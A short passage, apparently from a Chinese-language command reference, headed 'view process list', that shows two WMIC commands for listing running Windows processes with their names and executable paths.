| # 查看进程列表 6 | 7 | wmic process list full 8 | 9 | wmic process get Name,ExecutablePath 10 | 11 | --------------------------------------------------------------------------------